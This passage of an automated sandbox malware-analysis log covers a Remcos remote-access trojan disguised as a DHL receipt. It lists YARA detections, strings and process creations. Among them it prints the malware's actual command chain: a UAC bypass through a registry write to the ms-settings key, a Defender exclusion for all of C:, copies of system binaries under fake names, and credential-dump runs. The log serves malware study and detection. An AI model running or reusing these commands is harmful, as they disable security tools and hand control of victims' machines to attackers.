Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00416D72 20_2_00416D72
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00446D30 20_2_00446D30
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00446D8B 20_2_00446D8B
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00406E8F 20_2_00406E8F
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\yfkwifxL.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 2DA42093 appears 50 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028B7CC8 appears 49 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028A480C appears 865 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028A6650 appears 37 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 2DA41E65 appears 35 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028B7E14 appears 45 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028A46A4 appears 242 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 2DA74E10 appears 54 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 2DA74770 appears 41 times
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: String function: 028A44AC appears 69 times
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF7689C3448 appears 54 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 028E6650 appears 37 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 004169A7 appears 87 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 2D5D4E10 appears 54 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 004165FF appears 35 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 028E46A4 appears 152 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 028E480C appears 606 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 028F7CC8 appears 43 times
Source: C:\ProgramData\Remcos\remcos.exe Code function: String function: 00416760 appears 69 times
Source: C:\Users\Public\ger.exe Code function: String function: 00007FF6DF31D3D0 appears 56 times
Source: DHL119040 receipt document,pdf.exe Binary or memory string: OriginalFilename vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1801950205.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1734723673.0000000002326000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1764092562.000000002C470000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
Source: DHL119040 receipt document,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@69/31@6/5
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError, 7_2_00007FF7689B32B0
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA57952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_2DA57952
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B7952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 5_2_2D5B7952
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF313F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 19_2_00007FF6DF313F5C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A7F6A GetDiskFreeSpaceA, 0_2_028A7F6A
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4F8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, 0_2_2DA4F8FD
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B6D60 CoCreateInstance, 0_2_028B6D60
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 0_2_2DA5B4A8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 0_2_2DA5AC78
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\Public\xkn.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\ProgramData\Remcos\remcos.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: C:\Users\Public\Libraries\yfkwifxL.pif File created: C:\Users\user\AppData\Local\Temp\971D.tmp
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Remcos\remcos.exe System information queried: HandleInformation
Source: C:\Windows\System32\extrac32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 00000015.00000002.1816729060.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: remcos.exe, 00000014.00000002.1859873627.000000000270A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: DHL119040 receipt document,pdf.exe Virustotal: Detection: 18%
Source: DHL119040 receipt document,pdf.exe String found in binary or memory: -StartForward
Source: DHL119040 receipt document,pdf.exe String found in binary or memory: -address family not supported
Source: remcos.exe String found in binary or memory: _-address family not supported
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File read: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe"
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pif
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: unknown Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: unknown Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: unknown Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: archiveint.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: url.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: propsys.dll
